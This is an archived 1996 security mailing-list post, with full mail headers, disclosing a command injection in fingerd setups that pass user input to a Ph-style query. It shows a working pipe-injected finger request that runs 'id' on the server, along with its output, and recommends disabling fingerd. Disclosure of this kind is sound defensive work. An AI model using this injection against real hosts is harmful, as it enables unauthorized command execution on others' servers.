From proff  Sun Sep 29 19:55:05 1996
Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id TAA15016 for best-of-security; Sun, 29 Sep 1996 19:55:05 +1000
Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id PAA03650 for proff@suburbia.net; Sun, 29 Sep 1996 15:13:29 +1000
X-Envelope-From: twiggy@accel.net  Sun Sep 29 15:13:28 1996
Received: (sendmail@localhost) by suburbia.net (8.7.4/Proff-950810) id PAA03637 for <best-of-security@suburbia.net>; Sun, 29 Sep 1996 15:13:28 +1000
Received: from server.accel.net(205.206.169.2)
 via SMTP by suburbia.net, id smtpd03426aaa; Sun Sep 29 15:12:34 1996
Received: from server.accel.net ([205.206.169.94]) by server.accel.net
          (post.office MTA v1.9.1 ID# 0-11785) with SMTP id AAA291;
          Sun, 29 Sep 1996 01:15:52 -0500
X-Sender: twiggy@accel.net
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sun, 29 Sep 1996 01:11:02 -0400
To: best-of-security@suburbia.net
From: twiggy@accel.net (Twiggy)
Subject: fingerd/ph problems
Cc: twiggy@suicide.org
Message-ID: <19960929061551815.AAA291@server.accel.net>
Approved: proff@suburbia.net

Sites that run fingerd in a manner which hands user
input to a Ph-style database query may be allowing
untrusted, unchecked user input to reach the shell. 

I've seen a few sites with this sort of configuration 
recently. Perhaps in an attempt to limit available 
finger information, these sites use a Ph-style query to
match user input with available information, and to 
disallow general fingers as seen below:

%finger @victim.com
matches 0
No matches to your query.

The problem is illustrated by the following example:

%finger "|id@victim.com"
uid=60001(nobody) gid=60001(nobody)
/usr/local/bin/apitest: option requires an argument -- q
Usage: /usr/local/bin/apitest [-dqacr] [-s host] [-u user] [-p pass]
        -d debug

If you're using this kind of configuration you may wish
to disable fingerd until you've patched this, or better
yet, kill fingerd permanently (unless you have some kind
of pressing need to run it or you give out other information 
via fingerd).

twiggy
--
twiggy@suicide.org
http://www.suicide.org